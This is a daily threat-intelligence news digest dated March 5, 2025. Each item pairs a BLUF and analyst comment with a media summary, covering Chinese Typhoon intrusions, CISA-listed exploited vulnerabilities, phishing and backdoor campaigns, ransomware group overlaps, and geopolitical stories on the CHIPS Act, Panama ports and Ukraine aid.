Wednesday, Mar 05, 2025 // (IG): BB // GITHUB // SN R&D
Typhoon Cyber Attacks Highlight China’s Growing Cyber Capabilities and Strategic Intent
Bottom Line Up Front (BLUF): China-backed cyber threat groups, including Salt Typhoon and Volt Typhoon, continue to embed themselves in critical infrastructure networks, raising alarms about long-term sabotage potential. These advanced cyber operations target telecommunications, government, and civilian infrastructure, with implications for national security in the U.S., Australia, and allied nations. Australia’s intelligence agencies warn that cyber sabotage risks are increasing, reinforcing the need for greater defensive and offensive cyber capabilities.
Analyst Comments: The growing sophistication of Chinese cyber operations signals a shift from mere intelligence gathering to long-term strategic pre-positioning within critical systems. The ability of Volt Typhoon to persist within networks without deploying traditional malware makes detection and remediation particularly challenging. These intrusions are not just acts of espionage; they serve as a foundation for potential coercion or cyber warfare. Australia, as a key U.S. ally in the Indo-Pacific, must take proactive steps to strengthen its cyber defenses, limit technological dependence on China, and impose costs on cyber adversaries. Complacency in addressing this threat could leave critical systems vulnerable at a moment of geopolitical crisis.
FROM THE MEDIA: These state-backed actors have infiltrated U.S. telecommunications networks, enabling mass surveillance, phone call interception, and intelligence collection. Volt Typhoon has also embedded itself within critical infrastructure networks, using "living-off-the-land" techniques that make detection difficult. Some U.S. officials fear that China has gained persistent access to key systems, making it nearly impossible to ensure full removal of these intrusions. In Australia, intelligence leaders warn that cyber sabotage risks are escalating, with adversaries pre-positioning for potential future disruptions. The Australian Signals Directorate has ramped up cybersecurity efforts, assisting organizations in detecting stealthy intrusions and enhancing offensive cyber capabilities. As tensions rise in the Indo-Pacific, experts stress the urgent need to counter China’s growing cyber dominance and reduce reliance on Chinese technology.
READ THE STORY: ASPI
Trump Seeks to Eliminate $52.7 Billion CHIPS Act, Citing Wasteful Spending
Bottom Line Up Front (BLUF): President Donald Trump has called for the repeal of the $52.7 billion CHIPS and Science Act, a bipartisan law passed in 2022 to boost U.S. semiconductor manufacturing. Trump argued that the subsidies were ineffective and suggested reallocating any remaining funds toward reducing the national debt. The move comes amid a broader review of government spending. It has raised concerns from officials who say the law has driven significant investments from chipmakers like Intel, Samsung, and Taiwan Semiconductor Manufacturing Co. (TSMC).
Analyst Comments: Scrapping the CHIPS Act would represent a significant reversal in U.S. industrial policy, potentially undermining efforts to reduce dependence on foreign-made semiconductors. The law has already secured commitments from global chipmakers to expand U.S. production, including TSMC’s recently announced $100 billion investment in additional chip facilities. If Trump eliminates the subsidies, it could create uncertainty for ongoing projects and weaken America’s long-term semiconductor supply chain resilience. Additionally, reversing grant agreements signed under the Biden administration could trigger legal disputes with companies already receiving funding.
FROM THE MEDIA: Trump criticized the CHIPS Act in a speech to Congress, calling it a "horrible" law that failed to deliver meaningful results. Under the Biden administration, the Commerce Department awarded over $33 billion in subsidies to major semiconductor firms, with Intel receiving up to $7.86 billion, TSMC $6.6 billion, Samsung $4.75 billion, and Micron $6.1 billion. New York Governor Kathy Hochul defended the law, highlighting its role in bringing a $100 billion Micron facility and 50,000 jobs to the state. Meanwhile, sources revealed that about one-third of staff overseeing chip subsidies at the U.S. Commerce Department were recently laid off, indicating a shift in policy under the Trump administration.
READ THE STORY: Reuters
CISA Warns of Active Exploitation of Cisco, Microsoft, Hitachi, and Progress Vulnerabilities
Bottom Line Up Front (BLUF): The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five security vulnerabilities affecting Cisco, Hitachi Vantara, Microsoft Windows, and Progress WhatsUp Gold to its Known Exploited Vulnerabilities (KEV) catalog. These flaws, ranging from command injection to privilege escalation vulnerabilities, are actively exploited in the wild. Federal agencies have been mandated to apply necessary mitigations by March 24, 2025, to protect their networks from potential cyberattacks.
Analyst Comments: Including these vulnerabilities in CISA’s KEV catalog highlights the ongoing risk posed by legacy and modern software flaws. Notably, CVE-2023-20118 in Cisco routers is being used to recruit devices into botnets, while the CVE-2018-8639 flaw in Microsoft Windows continues to be leveraged by Chinese threat actors for privilege escalation. Attackers increasingly target end-of-life (EOL) devices and unpatched enterprise software, making proactive patching critical. Organizations should prioritize remediation and consider network segmentation strategies to limit the damage from successful exploits.
FROM THE MEDIA: These flaws, which range from command injection to privilege escalation vulnerabilities, are being leveraged by cybercriminals and nation-state actors. Notably, CVE-2023-20118 in Cisco Small Business RV Series routers is being used to recruit devices into the PolarEdge botnet. At the same time, CVE-2018-8639 in Microsoft Windows is exploited by the Chinese hacking group Dalbit (m00nlight) for privilege escalation. Additionally, Hitachi Vantara Pentaho BA Server vulnerabilities (CVE-2022-43939 and CVE-2022-43769) allow authorization bypass and arbitrary command execution, and CVE-2024-4885 in Progress WhatsUp Gold enables unauthenticated remote code execution, with exploitation attempts observed from Hong Kong, Russia, Brazil, South Korea, and the UK. As attackers increasingly target end-of-life (EOL) devices and unpatched enterprise software, organizations must prioritize patching, network segmentation, and proactive security measures to mitigate risks.
READ THE STORY: THN
CK Hutchison Sells Panama Canal Stake to BlackRock, Shares Surge 22%
Bottom Line Up Front (BLUF): CK Hutchison has sold a majority stake in its $22.8 billion port unit, including 90% of Panama Ports Company, to a BlackRock-led consortium. The deal grants U.S. firms significant control over key Panama Canal docks amid rising U.S.-China geopolitical tensions. CK Hutchison's stock soared 22% following the announcement, with JPMorgan calling the sale "surprising" and "opportunistic."
Analyst Comments: This deal marks a strategic shift in port ownership, transferring crucial infrastructure from a Hong Kong-based conglomerate to U.S. interests. While CK Hutchison insists the sale is purely commercial, the move aligns with Washington’s push to reduce Chinese influence over global supply chains. The Panama Canal’s importance to U.S. trade makes this acquisition geopolitically significant, especially with China. The sale also raises questions about CK Hutchison's future strategy, as ports will now contribute just 1% of its earnings, down from 15%.
FROM THE MEDIA: CK Hutchison announced the sale of its 80% stake in Hutchison Ports, a $22.8 billion business unit, to a consortium led by BlackRock, Terminal Investment, and Global Infrastructure Partners. This transaction includes a 90% stake in Panama Ports Company, which has operated key terminals along the Panama Canal for over two decades. The sale follows a recent ruling by Panama's attorney general that deemed Hutchison's port contract "unconstitutional," with the Supreme Court set to issue a final decision. The U.S. has advocated for reducing Chinese control over strategic infrastructure, making this sale particularly timely. JPMorgan analysts noted that while selling the Panama operations makes sense, the deal was unexpected and could signal a broader shift in CK Hutchison’s business focus.
READ THE STORY: Reuters // WSJ
Eutelsat in Talks to Expand Satellite Services in Ukraine Amid Starlink Uncertainty
Bottom Line Up Front (BLUF): Eutelsat, the French satellite operator and owner of OneWeb, is discussing enhancing satellite connectivity in Ukraine with European governments. The move comes as concerns grow over Ukraine’s reliance on Elon Musk’s Starlink, notably after reports suggested U.S. officials may restrict access. Eutelsat’s stock surged up to 123% following the announcement, as investors speculate that European leaders are seeking alternatives to Starlink for military and government communications.
Analyst Comments: The discussions signal Europe’s strategic push to reduce dependence on U.S.-controlled technology, mainly as political uncertainty surrounds Starlink's availability in Ukraine. While OneWeb's satellite network is smaller and older than Starlink's, it offers European governments greater control over critical communications infrastructure. This shift aligns with broader European efforts to boost self-reliance in defense and technology, especially as the EU considers a €150 billion loan package for military procurement. However, OneWeb’s technological limitations—such as higher latency and less portability than Starlink—could pose operational challenges for Ukrainian forces.
FROM THE MEDIA: Eutelsat confirmed its ongoing collaboration with European institutions and business partners to provide satellite services that support critical missions and infrastructure in Ukraine. The company is exploring the use of its OneWeb low-Earth orbit (LEO) satellites (1,200 km altitude) and geostationary (GEO) satellites (35,000 km altitude) to ensure reliable connectivity, particularly for military drone operations. The European Commission is also considering integrating Ukraine into its GovSatCom program, which aims to pool the satellite capabilities of EU member states into a secure network. However, this initiative may take years to become fully operational.
READ THE STORY: FT
Hackers Exploit ClickFix Trick to Deploy Havoc C2 via SharePoint
Bottom Line Up Front (BLUF): A new phishing campaign uses the ClickFix trick to deliver the Havoc command-and-control (C2) framework via SharePoint. Attackers leverage phishing emails containing an HTML file that tricks users into executing a malicious PowerShell command. This triggers a multi-stage infection process that ultimately deploys the Havoc Demon malware, a C2 agent used for data exfiltration and system control. Fortinet FortiGuard Labs warns that the campaign exploits Microsoft Graph API to disguise C2 communications within legitimate services.
Analyst Comments: The ClickFix trick is particularly effective because it manipulates user behavior rather than relying solely on software exploits. Havoc, an open-source post-exploitation framework, also suggests that the campaign could be linked to sophisticated threat actors or red team groups turned malicious. Organizations should reinforce phishing awareness training and implement endpoint detection solutions capable of identifying anomalous PowerShell activity.
FROM THE MEDIA: According to Fortinet, the attack begins with a phishing email containing an HTML attachment ("Documents.html") that claims a Microsoft OneDrive error requires manual DNS cache updates. If the victim follows the instructions, they execute a PowerShell script hosted on a SharePoint server. The script then downloads a Python interpreter and additional payloads, including KaynLdr, a reflective loader that launches the Havoc Demon agent. The malware can gather system information, manipulate authentication tokens, and execute additional payloads while masking its C2 traffic through Microsoft Graph API. Fortinet warns that this technique allows threat actors to blend malicious activity with legitimate network traffic, making detection more difficult.
READ THE STORY: THN
U.S. Sanctions Iranian National Behind Defunct Nemesis Darknet Marketplace
Bottom Line Up Front (BLUF): The U.S. Treasury Department has sanctioned Iranian national Behrouz Parsarad, accusing him of operating the now-defunct Nemesis darknet marketplace and facilitating the sale of illicit drugs, cybercrime tools, and fake documents. Nemesis, which was taken down in March 2024, reportedly handled nearly $30 million in drug sales, including fentanyl trafficking. Authorities say Parsarad has attempted to rebuild a similar marketplace since its takedown. The sanctions also include 49 cryptocurrency wallets linked to his illicit activities.
Analyst Comments: By targeting Parsarad’s financial networks, including cryptocurrency laundering, the Treasury aims to disrupt future illicit operations. However, history has shown that when one darknet marketplace is shut down, others quickly emerge to fill the void. The focus on fentanyl-related transactions also aligns with the U.S. government’s broader efforts to combat the opioid crisis. Given Parsarad’s continued attempts to re-establish a marketplace, further law enforcement action against successor platforms is likely.
FROM THE MEDIA: The Nemesis marketplace, founded in 2021, attracted over 150,000 users before it was dismantled in a joint law enforcement operation involving Germany, the U.S., and Lithuania. Nearly 20% of its estimated 1,100 sellers were based in Germany, according to the German Federal Police (BKA). The site offered a range of illegal goods, including ransomware services, phishing kits, and DDoS-for-hire attacks. Parsarad, who controlled Nemesis and its cryptocurrency wallets, reportedly profited significantly from transaction fees and laundering services. The U.S. Treasury’s Office of Foreign Assets Control (OFAC) coordinated the sanctions as part of the FBI-led Joint Criminal Opioid and Darknet Enforcement Team, marking a broader effort to dismantle similar platforms.
READ THE STORY: The Record
Trump Administration Halts U.S. Cyber Command Operations Against Russia
Bottom Line Up Front (BLUF): The Trump administration has reportedly ordered U.S. Cyber Command to pause offensive cyber operations against Russia, marking a significant shift in U.S. cybersecurity strategy. This decision is part of a broader effort to reset relations with Moscow, including easing sanctions and repatriating Russian cybercriminals in prisoner swaps. Security experts warn that this move could weaken U.S. cyber defenses and allow Russia to strengthen its networks and escalate cyber activities.
Analyst Comments: Pausing offensive cyber operations against Russia could have significant long-term consequences. For years, Cyber Command has played a key role in disrupting Russian cyber threats, including ransomware groups, election interference, and attacks on U.S. infrastructure. A temporary halt could allow Russian operatives to reconfigure their networks and adopt new tactics, making future U.S. cyber efforts less effective. While the Trump administration appears to be shifting focus to China as the primary cyber threat, sidelining Russia may embolden its state-backed hackers and criminal groups to act with less resistance. This policy change could also strain relations with U.S. allies who view Russia as a cybersecurity adversary.
FROM THE MEDIA: Reports indicate that the Trump administration has instructed U.S. Cyber Command to suspend offensive cyber operations targeting Russia, signaling a dramatic foreign policy shift. The decision aligns with broader diplomatic efforts to improve ties with Moscow, including potential sanctions relief and prisoner swaps involving Russian cybercriminals. The Kremlin has welcomed these actions, stating that U.S. policy is now more in line with Russian interests. Experts warn that this pause could set back months of cyber planning, as offensive operations require extensive intelligence gathering. Additionally, adversaries from other nations could take advantage of the gap, masking their own activities behind Russian cyber tactics. While the Cybersecurity and Infrastructure Security Agency (CISA) insists that Russian cyber threats remain a priority, this shift in strategy could have far-reaching security implications.
READ THE STORY: Axios
Iranian-Linked Hackers Exploit Indian Firm to Target UAE Aviation Sector
Bottom Line Up Front (BLUF): A suspected Iranian-aligned hacking group, UNK_CraftyCamel, leveraged a compromised Indian electronics company's email to launch a highly targeted phishing attack against aviation and satellite communications organizations in the United Arab Emirates (UAE). The attack used malicious ZIP files with polyglot payloads to deliver a new Golang-based backdoor, Sosano, allowing attackers to establish remote access to compromised systems.
Analyst Comments: By compromising a trusted third-party business partner, UNK_CraftyCamel bypassed traditional phishing defenses, making detection more difficult. Golang malware, which is harder to analyze due to its cross-platform capabilities and complex compilation structure, suggests a shift in Iranian cyber tactics. Targeting aviation and satellite communications aligns with Iranian geopolitical interests, as these sectors are critical for both UAE’s national security and economic infrastructure. Polyglot files—documents that can be interpreted as multiple formats—demonstrate an advanced obfuscation strategy, indicating a well-resourced and highly specialized threat actor.
FROM THE MEDIA: The emails contained malicious ZIP files hosted on a fake domain (indicelectronics[.]net), tricking victims into opening them. The ZIP files contained an Excel (XLS) file disguised as a shortcut (LNK) and two PDFs embedded with hidden payloads. Upon execution, the LNK file ran a malicious HTA script, which extracted and executed a DLL backdoor embedded in an image file using XOR decryption. The Sosano backdoor then connected to a command-and-control (C2) server, awaiting further instructions. Sosano has limited but effective functions, allowing attackers to browse directories, execute commands, download additional payloads, and delete files. Researchers found no clear overlaps with known threat groups but suspect links to Iran’s Islamic Revolutionary Guard Corps (IRGC) based on tactics and target selection.
READ THE STORY: THN
Taiwan Looks to Ukraine for Contingency Planning Amid Rising Chinese Threats
Bottom Line Up Front (BLUF): Taiwan studies how Ukrainian businesses have maintained operations during wartime to bolster its contingency planning in the face of increasing Chinese military pressure. A senior Taiwan security official revealed that the government is working to integrate private companies into national resilience strategies, drawing lessons from Ukraine’s use of supermarkets for supply distribution and taxi services for medical emergencies. A recent closed-door workshop in Taipei included security officials and diplomats from the U.S., Japan, and Australia.
Analyst Comments: While Taiwan has long focused on military readiness, this initiative suggests a shift toward whole-of-society resilience involving critical infrastructure, cybersecurity, and private-sector cooperation. The emphasis on digital infrastructure security, particularly in response to potential cyberattacks, mirrors Ukraine’s experience of sustained Russian cyber operations. By fostering stronger ties with Ukrainian companies and international allies, Taiwan is signaling its determination to prepare for both conventional and asymmetric threats China poses.
FROM THE MEDIA: A senior Taiwan official told Reuters that Taipei is actively working with Ukrainian businesses to enhance contingency planning, citing companies like Uber and Microsoft that continued operations during the war. The government is particularly interested in strategies for maintaining food supply chains, emergency transportation, and financial services. Security experts at a recent workshop stressed the importance of cloud-based systems, pointing to Russian cyberattacks on Ukraine’s infrastructure as a key lesson. Taiwan is also revamping its air-raid alert and shelter systems, incorporating insights from Northern Europe and the Baltic states. These efforts come as China continues to ramp up military drills and economic pressure against Taiwan, which Beijing claims as its territory.
READ THE STORY: Reuters
Chinese Cyber Espionage Expands Across Industries, Driven by Geopolitical Ambitions
Bottom Line Up Front (BLUF): Chinese state-backed cyber espionage has escalated across multiple industries, with CrowdStrike reporting a 150% rise in intrusions globally in 2024. Seven new China-linked threat groups were identified, targeting not only government and technology sectors but also finance, media, and manufacturing. The expansion aligns with China's long-term geopolitical ambitions, particularly regarding Taiwan. Chinese groups have also refined their tactics, sharing malware tools and exploiting vulnerabilities in cloud environments and internet-facing infrastructure.
Analyst Comments: The diversification of targets suggests a strategic shift toward broader economic and geopolitical objectives. The use of shared malware, such as KEYPLUG and PlugX, and resilient operational relay networks complicates attribution and mitigation efforts. Organizations should prioritize identity security, patching internet-exposed systems, and monitoring for subtle indicators of compromise, as China-backed groups quickly adapt to new defensive measures. The growing focus on Taiwan suggests that cyber operations could play a key role in future geopolitical conflicts.
FROM THE MEDIA: According to CrowdStrike’s 2025 Global Threat Report, China-backed cyber intrusions surged by 150% in 2024, with some industries experiencing a 200-300% increase in attacks. Traditionally, Chinese hackers focused on government, telecom, and technology sectors, but attacks against financial services, media, and manufacturing saw the most significant growth. Newly identified groups such as Liminal Panda, Locksmith Panda, and Operator Panda have specialized in breaching telecom networks. Vault Panda and Envoy Panda continue to target government and diplomatic entities. The attackers rely on shared malware, including KEYPLUG and PlugX, and maintain sophisticated relay networks to obfuscate operations. CrowdStrike attributes the rise in activity to China's strategic investment in cyber capabilities, which includes training elite hackers and developing advanced cyber tools. The report warns that these operations align with China’s broader regional ambitions, including its objective of reunifying with Taiwan.
READ THE STORY: CSO
Black Basta Affiliates Suspected in CACTUS Ransomware Operations
Bottom Line Up Front (BLUF): Researchers have identified strong links between the CACTUS and Black Basta ransomware operations, indicating that former Black Basta affiliates may have transitioned to CACTUS. Both ransomware groups have been found using the same BackConnect (BC) module, known as QBACKCONNECT, to maintain persistent access to compromised systems. The overlap in tactics, techniques, and procedures (TTPs) highlights an evolving ransomware landscape, where actors adapt to law enforcement actions by rebranding and refining their operations.
Analyst Comments: The connection between CACTUS and Black Basta underscores how ransomware groups continuously adapt to law enforcement crackdowns, such as the disruption of QakBot. The shared use of the BC module suggests a high degree of operational familiarity between the two groups, reinforcing the notion that cybercriminals frequently migrate between ransomware-as-a-service (RaaS) operations. Organizations should remain vigilant, as these groups leverage sophisticated social engineering techniques, including vishing and IT support impersonation, to gain initial access. Strengthening endpoint security and implementing strict access controls remain crucial defenses against these evolving threats.
FROM THE MEDIA: Black Basta attackers have employed deceptive tactics, such as email bombing campaigns and impersonation of IT support staff, to trick victims into installing remote access tools like Quick Assist. Once access is obtained, the attackers sideload malicious DLLs using legitimate executables, ultimately deploying the BackConnect module. The CACTUS ransomware group has been observed using identical techniques, reinforcing suspicions that Black Basta affiliates have transitioned to CACTUS following QakBot’s disruption. Recent leaks from Black Basta’s internal chat logs reveal that its members share stolen credentials from information-stealer malware, indicating a continued reliance on compromised credentials for initial access.
READ THE STORY: THN
Items of interest
Zelenskyy Signals Readiness for Talks as US Aid Freeze Shakes Kyiv
Bottom Line Up Front (BLUF): Ukrainian President Volodymyr Zelenskyy is making diplomatic overtures to repair relations with President Donald Trump after a tense Oval Office meeting led to the suspension of US military aid. Facing mounting pressure, Zelenskyy expressed readiness for peace talks and sought to salvage a stalled US-Ukraine minerals deal. However, the sudden halt in arms deliveries has heightened concerns about Ukraine’s ability to defend against Russian missile strikes.
Analyst Comments: The suspension of U.S. military aid is a severe blow to Ukraine, which relies heavily on American support to counter Russian aggression. Trump’s demand for immediate ceasefire concessions aligns with his broader push for a quick resolution to the war, potentially at Ukraine’s expense. The minerals deal, which could provide Ukraine with crucial economic leverage, remains in limbo, underscoring the high stakes of the diplomatic fallout. If military assistance remains frozen, Ukraine may face increasing battlefield vulnerabilities, while European allies could be forced to step up their support.
FROM THE MEDIA: During a meeting at the White House last Friday, tensions flared between Trump and Zelenskyy over Ukraine’s reluctance to agree to an immediate ceasefire. Following the dispute, Trump suspended all U.S. military aid, a move that alarmed both Kyiv and European allies. Zelenskyy has since sought to repair relations, emphasizing Ukraine’s willingness to negotiate a lasting peace under Trump’s leadership. Meanwhile, a critical minerals deal intended to boost U.S.-Ukraine cooperation was derailed by the fallout. Andriy Yermak, Zelenskyy’s chief of staff, is leading efforts to salvage the agreement, engaging with Republican lawmakers. France has proposed a limited ceasefire covering missile and drone attacks on civilian infrastructure, but the plan has yet to gain broad support. Ukrainian officials warn that without U.S. assistance, Russia could intensify its missile strikes, posing significant risks to the country’s defense capabilities.
READ THE STORY: FT
Ukrainian President Zelensky ‘wants to make things right’ with US President Trump (Video)
FROM THE MEDIA: Ukraine's President Volodymyr Zelensky has said his explosive Oval Office meeting with Donald Trump on Friday was "regrettable", in his first public remarks since the US announced a pause in military aid to Kyiv.
Zelensky says he is ready to sign minerals deal (Video)
FROM THE MEDIA: The Ukrainian president, Volodymyr Zelenskyy, talking to reporters after a summit with European leaders in London, sought to move the conversation forward from his difficult meeting with Donald Trump and signalled Ukraine’s readiness to sign a minerals deal.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.